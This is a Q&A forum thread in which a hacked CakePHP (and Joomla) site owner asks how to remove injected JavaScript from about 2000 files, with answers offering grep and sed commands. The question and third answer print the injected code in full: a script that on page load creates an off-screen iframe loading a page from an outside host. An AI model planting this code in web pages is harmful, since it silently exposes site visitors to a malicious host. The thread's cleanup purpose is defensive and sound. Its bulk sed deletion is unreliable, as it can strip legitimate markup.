Need to delete the virus code in cakephp script using the linux command

Question

Yesterday my site was hacked and it has the code like:

<script>  
    function frmAdd() { 
        var ifrm = document.createElement('iframe'); 
        ifrm.style.position='absolute'; 
        ifrm.style.top='-999em'; 
        ifrm.style.left='-999em'; 
        ifrm.src = \"http://fenwaywest.com/media/index.php\";
        ifrm.id = 'frmId';
        document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
</script>";

When I search the server using the below command to find the affected files

grep -r "<script>  function frmAdd()" /path/

I got more than 2000 files.

Now I need to remove that line only. Please, someone can you guide the command only to remove that line in all 2000 files?

Answer 1

Back up first! Then, you might try something like this:

grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'

This will delete any line matching that regex. It also assumes the path does not contain spaces (hopefully a reasonable assumption here).

Answer 2

Try to use the CakePHP sanitize Class when printing a user data:

echo Sanitize::html($badString);

Answer 3

Do you have any lack cleaning the virus? Because I got the same virus. My site in in joomla.

EDIT:

I use the code:

grep -lr " function frmAdd" public_html | xargs sed -i '/ function frmAdd/d'

but if you have something like this

    <html><body bgcolor="#FFFFFF"><!--ef09d2--><script>  function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;</script><!--/ef09d2-->
</body></html>

this will return only </body></html>